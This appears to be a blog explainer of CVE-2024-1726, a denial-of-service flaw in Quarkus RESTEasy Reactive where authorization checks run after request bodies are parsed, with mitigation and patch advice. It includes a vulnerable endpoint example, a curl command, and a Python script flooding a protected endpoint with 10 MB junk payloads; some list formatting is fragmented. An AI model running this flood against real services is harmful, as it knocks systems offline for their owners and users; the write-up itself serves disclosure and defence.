CVE-2024-1726 - Denial of Service Risk in Quarkus RESTEasy Reactive – Explained Step By Step

A recent security flaw, identified as CVE-2024-1726, has been discovered in the RESTEasy Reactive implementation within the popular Quarkus Java framework. The issue revolves around *improper timing* of security checks for JAX-RS endpoints: authorization and other checks are triggered after the request body processing and serialization steps. This means that an attacker can send large or malicious requests, knowing that the server will spend precious RAM and CPU parsing/serializing the data—*before* rejecting requests for being unauthorized. If exploited, this can cause a Denial of Service (DoS), making your application slow or entirely unresponsive.

This post breaks down how the flaw works, what it looks like in code, and what you can do to protect your service.

What is RESTEasy Reactive and Who’s Affected?

RESTEasy Reactive is a high-performance, low-overhead REST server extension for Quarkus, relied on to build Java REST APIs. The issue affects Quarkus projects using RESTEasy Reactive for JAX-RS endpoints, especially if:

Incoming request arrives

- Request body is deserialized/parsed
- → Only now, security/authorization checks run

If failed, response is "403 Forbidden" or similar

Problem: Expensive resource work (like parsing big JSON files or uploading multi-megabyte files) happens even WHEN the request should never have passed security.

An attacker could

- Discover any authenticated/secured REST endpoint that accepts large bodies

Your Java application or container could run out of memory, CPU, or both

This becomes a practical Denial of Service (DoS) attack.

The flaw exists in the order of operations – authorization or other security logic MUST happen *before* the request body is handled.

Here’s a simplified vulnerable endpoint in Quarkus using RESTEasy Reactive

import jakarta.ws.rs.*;
import jakarta.ws.rs.core.MediaType;
import jakarta.annotation.security.RolesAllowed;

@Path("/user/upload")
public class UploadResource {

    @POST
    @Consumes(MediaType.APPLICATION_JSON)
    @RolesAllowed("admin")
    public String uploadFile(LargePayloadObject payload) {
        // some business logic here
        return "uploaded";
    }
}

What’s wrong here?

Even though the endpoint is protected by @RolesAllowed("admin"), Quarkus RESTEasy Reactive (before the patch) deserializes the HTTP body (into LargePayloadObject) before checking if the caller is an 'admin'.

Suppose they don’t have credentials for “admin.” They send huge requests

curl -X POST http://your-app/user/upload \
     -H 'Content-Type: application/json' \
     -d @bigfile.json

- Your app consumes memory and CPU to parse bigfile.json (which could be many megabytes/gigabytes)

Is There a Working Exploit?

Yes, an exploit is trivial. All an attacker needs is a valid endpoint path and knowledge the endpoint is "protected" (returns 401 or 403).

A proof-of-concept exploit script (for testing your own systems)

import requests

# Fill this with target endpoint path
url = "http://your-app:808/user/upload";
huge_payload = "A" * 10_000_000  # 10 MB of junk

for i in range(100):  # Send 100 requests
    resp = requests.post(url, data=huge_payload, headers={'Content-Type': 'application/json'})
    print("Got status:", resp.status_code)

On an affected service, RAM and CPU usage will spike, even though all responses will likely be 403 Forbidden.

Red Hat Security Advisory:

CVE-2024-1726

Quarkus Security Issue:

Quarkus Github Issue #35267

How is it Patched?

Quarkus fixed this by adjusting the order: the framework now checks security constraints *before* attempting to parse the request body. As soon as an unauthorized user hits the endpoint, their request is rejected without wasting processor or memory.

Upgrade your Quarkus dependencies to the latest released version where this bug is fixed (see the Quarkus announcement for details).

Implement Request Size Limits:

Add a reverse proxy (like NGINX/Apache) with a request size cap, or use Quarkus-specific limits.

Zero Trust for Endpoints:

Avoid exposing internal/protected endpoints on the public internet.

Monitor Usage:

Watch for abnormal CPU/memory spikes and set up alerts for high request rates or unusual body sizes.

Conclusion

CVE-2024-1726 is a reminder for developers using frameworks like Quarkus: *the order of security checks and data processing matters*. If you run Java REST APIs and haven’t patched or set body limits, you might be exposing yourself to denial-of-service attacks.

Patch early, patch often – and always put security first.

*If you found this writeup helpful, consider sharing and spreading awareness in your dev teams. Stay safe!*

Timeline

Published on: 04/25/2024 17:15:48 UTC
Last modified on: 04/25/2024 17:24:59 UTC